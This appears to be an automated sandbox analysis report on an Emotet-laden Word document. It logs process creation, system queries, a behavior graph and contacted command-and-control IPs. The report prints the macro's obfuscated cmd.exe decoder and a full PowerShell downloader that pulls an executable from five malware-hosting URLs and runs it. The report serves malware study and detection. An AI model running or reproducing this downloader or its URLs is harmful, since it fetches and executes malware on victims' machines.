Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe CmD /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;14;51;75;65;14;78;25;6;77;66;24;11;20;7;20;58;23;20;42;23;47;51;
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';'
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe CmD /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;14;51;75;65;14;78;25;6;77;66;24;11;20;7;20;58;23;20;42;23;47;51;
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (6 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\968.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\startedradar.exe | Queries volume information: C:\ VolumeInformation
Contains functionality to query windows version
Source: C:\Users\user\AppData\Local\Temp\968.exe | Code function: 12_2_004B277F RtlGetVersion,GetNativeSystemInfo
Queries the cryptographic machine GUID
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
Behavior Graph ID: 105688
Sample: PAY3646944800277778.doc
Start date: 23/01/2019
Architecture: WINDOWS
Score: 100

Sample-level signatures (graph image not recoverable from the text; the node list below is what survives):
  • Multi AV Scanner detection for domain / URL
  • Antivirus detection for URL or domain
  • Multi AV Scanner detection for submitted file
  • 5 other signatures

Process tree:
  • WINWORD.EXE started (graph counters: 43, 60)
    • Document exploit detected (process start blacklist hit)
    • cmd.exe started (graph counter: 1)
      • cmd.exe started (graph counter: 1)
      • conhost.exe started
  • startedradar.exe started
    • Detected Emotet e-Banking trojan
    • Drops executables to the windows directory (C:\Windows) and starts them
    • startedradar.exe started
      • 189.253.39.50, ports 49801, 8080 (UninetSAdeCVMX, Mexico)
      • 206.248.110.184, port 8080 (LCPR-HSD-LibertyCablevisionofPuertoRicoLTDPR, Puerto Rico); Detected TCP or UDP traffic on non-standard ports
      • 182.180.170.72, ports 22, 49797 (PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK, Pakistan)
  • svchost.exe started (graph counter: 4)
  • cmd.exe (graph text cut off here; parent edge not present in the source)